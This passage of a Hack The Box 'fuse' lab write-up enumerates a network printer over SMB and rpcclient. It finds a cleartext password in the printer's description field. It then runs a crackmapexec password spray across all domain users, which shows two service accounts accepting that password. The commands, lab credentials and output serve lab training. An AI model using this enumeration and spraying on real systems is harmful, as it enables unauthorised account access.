Printer
As previously identified from the authenticated SMB session, there seems to be a network printer attached to the target system.
It’s named HP-MFT01 and available over SMB for network access
There are 2 ways to go about enumerating a network-attached printer, I will show case both of them here
Windows
This method requires a Windows machine
I can navigate to the UNC path of the target SMB server.
This should prompt for authentication.
I can authenticate using one of the valid domain credentials
It now reveals the SMB shares that the authenticated user has access to.
Notice the hp-mft01 share is now available for access, which wasn’t the case from smbclient on a Linux environment
I will double-click the share to connect to the printer
Upon connecting, the current Windows client downloads the driver and sets up the local printer objects for use.
The printer is now accessible.
It also reveals the log that I saw earlier in the web server as well
Checking the properties of the printer
There is a CLEARTEXT password hard-coded into the Location attribute of the printer’s properties, $fab@s3Rv1ce$1
It says that it’s for scan2docs which may require the password. That might be the reason why it’s hard-coded here, to help users.
This can also be done through the PowerShell cmdlet, Get-Printer
Linux
On the Linux host, I can enumerated the network-attached printer through the target MSRPC service. Since the printer is shared over SMB for network access, it would be mapped through the MSRPC service.
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ rpcclient $IP -U 'fabricorp.local\tlavel%Qwer1234'
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ rpcclient FUSE.FABRICORP.LOCAL -U 'fabricorp.local\tlavel%Qwer2225'
rpcclient $> enumprinters
flags:[0x800000]
name:[\\FUSE.FABRICORP.LOCAL\HP-MFT01]
description:[\\FUSE.FABRICORP.LOCAL\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]The CLEARTEXT password can be seen in the description attribute; $fab@s3Rv1ce$1
WARNING for the DNS setting. Authenticating to the domain FAILS, as it MUST be the attached-machine
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u users -p '$fab@s3Rv1ce$1' --continue-on-success
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\Guest:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\krbtgt:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [+] FABRICORP.LOCAL\svc-print:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [+] FABRICORP.LOCAL\svc-scan:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\dandrews:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\mberbatov:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\dmuir:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\astein:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\sthompson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\bnielson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\fuse:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\pmerton:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\tlavel:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\bhult:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] FABRICORP.LOCAL\administrator:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE Performing a password spray attack to all the users against the SMB server reveals that the password belongs to 2 domain users
svc-print:$fab@s3Rv1ce$1
svc-scan:$fab@s3Rv1ce$1